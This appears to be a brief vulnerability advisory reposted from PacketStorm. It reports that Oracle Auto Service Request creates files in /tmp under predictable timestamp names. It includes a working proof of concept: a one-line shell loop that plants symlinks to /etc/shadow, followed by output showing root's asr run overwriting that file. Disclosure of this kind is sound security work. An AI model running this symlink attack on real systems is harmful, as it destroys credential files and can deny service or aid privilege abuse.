Oracle Auto Service Request File Clobber

[Praetorian503]

Oracle Auto Service Request creates files insecurely in /tmp using time stamps instead of mkstemp(). Due to this, it is possible to clobber root owned files and possibly cause a denial of service condition or worse.

Oracle Auto Service Request software package creates files insecurely in /tmp using time stamps instead of mkstemp().  You can clobber root owned files if you know when around the time the root administrator will be using this utility.



[larry@oracle-os-lab01 tmp]$ for x in `seq  500 999`; do ln -s /etc/shadow /tmp/status1_020213003$x; done


root executes the asr command:

[root@oracle-os-lab01 bin]# ./asr

  register OR register [-e asr-manager-relay-url]: register ASR
  unregister : unregister ASR
  show_reg_status : show ASR registration status
  test_connection : test connection to Oracle
.
.
.

  version : show asr script version
  exit
  help : display a list of commands
  ? : display a list of commands


asr> 

/etc/shadow is now overwritten with the contents of /tmp/status1_020213003722
root # cat /etc/shadow

id  State       Bundle
68  ACTIVE      com.sun.svc.asr.sw_4.3.1
              Fragments=69, 70
69  RESOLVED    com.sun.svc.asr.sw-frag_4.3.1
              Master=68
70  RESOLVED    com.sun.svc.asr.sw-rulesdefinitions_4.3.1
              Master=68
72  ACTIVE      com.sun.svc.asr.sw.http.AsrHttpReceiver_1.0.0
              Fragments=73
73  RESOLVED    com.sun.svc.asr.sw.http-frag_1.0.0
              Master=72

67  ACTIVE      com.sun.svc.ServiceActivation_4.3.1

Source: PacketStorm